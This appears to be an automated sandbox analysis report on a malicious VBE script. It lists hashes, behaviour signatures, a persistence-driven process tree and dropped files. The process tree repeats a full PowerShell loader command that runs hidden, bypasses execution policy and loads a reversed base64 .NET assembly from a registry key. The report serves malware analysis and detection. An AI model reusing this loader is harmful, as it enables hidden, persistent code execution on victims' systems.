Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    28s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    11/03/2025, 19:16

General

  • Target

    ovQc.vbe

  • Size

    10KB

  • MD5

    ba104bdc908f978aaa1c4bdc39a3553a

  • SHA1

    b1d0111c23c09f659fc9993ff5d1304c06ed5ba1

  • SHA256

    2bfd3a4cf58b0bc16b1af17eba113dbd58d00d7b199634d08428126f79e2bf9c

  • SHA512

    236b6666b7a3a994f519c6ba2f77a358c23d430d34300dbf2c948b121199f3094b7ce3a3060b32d46dd2d272b610fb5c1621530f7917fb775195594c3ef82b9b

  • SSDEEP

    96:Lh31q9lqKylGu47UgHw63nw7ZAy6e3GowTC0qaXSZM6fiEoqDzG3gYBl/U4QlI+K:Lh1q9lqKy8wcnsay6eoeAaMZqfOHTSdK

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

    Run Powershell and hide display window.

  • Drops file in System32 directory 11 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ovQc.vbe"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2324
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2436
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {9461EC26-5943-456B-930A-2C29F4AC6F9C} S-1-5-21-2703099537-420551529-3771253338-1000:XECUDNCD\Admin:Interactive:[1]
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2132
    • C:\Windows\System32\WScript.exe
      C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\ifGtcQfISxddcGn.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2168
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2376
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1304
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:572
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3048
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1044
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2440
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1960
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2808
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        PID:2052
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2452
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2612
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\ifGtcQfISxddcGn' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [b.b]::b('ifGtcQfISxddcGn')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:924

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    b2848a42adb72efb55f1873d8b8287d2

    SHA1

    a8c06d667d2d52664c9989f00eecca44229de0be

    SHA256

    9d1483a93d843b296b661bb20cc989b46fc05d30c6a8eb8a1c914a6e4a3fb626

    SHA512

    faa46d76526d696ac4ddc187aeb75f04bb3ea9aded34f61b190ba368a35ee9191aa172c88942949134ebfef44b5fe69d5d68483fd8b5bfbae3bd6998e2328d1f

  • C:\Users\Admin\AppData\Roaming\ifGtcQfISxddcGn.vbs

    Filesize

    2KB

    MD5

    ae38697351c86c7aed1711c9edc478af

    SHA1

    fc723672262fb8d6e5020a14e39b47a25d35aa5f

    SHA256

    f400644bd84a139f46d9aa7e315012ec04efe0ce966a434bd479a28155bee5af

    SHA512

    fbe8b492c5191e7bfe7b44c7ac00fdbcb46c9c39b28000a3d57122533bdf994109119831defc8403d74fdc84551c13b476c01275b68487cda05f9ad54b1fbd82

  • memory/2436-10-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp

    Filesize

    9.6MB

  • memory/2436-9-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp

    Filesize

    9.6MB

  • memory/2436-11-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp

    Filesize

    9.6MB

  • memory/2436-5-0x000007FEF610E000-0x000007FEF610F000-memory.dmp

    Filesize

    4KB

  • memory/2436-12-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp

    Filesize

    9.6MB

  • memory/2436-13-0x0000000002BE0000-0x0000000002BEA000-memory.dmp

    Filesize

    40KB

  • memory/2436-14-0x000007FEF610E000-0x000007FEF610F000-memory.dmp

    Filesize

    4KB

  • memory/2436-15-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp

    Filesize

    9.6MB

  • memory/2436-6-0x000000001B5D0000-0x000000001B8B2000-memory.dmp

    Filesize

    2.9MB

  • memory/2436-8-0x0000000002810000-0x0000000002818000-memory.dmp

    Filesize

    32KB

  • memory/2436-7-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp

    Filesize

    9.6MB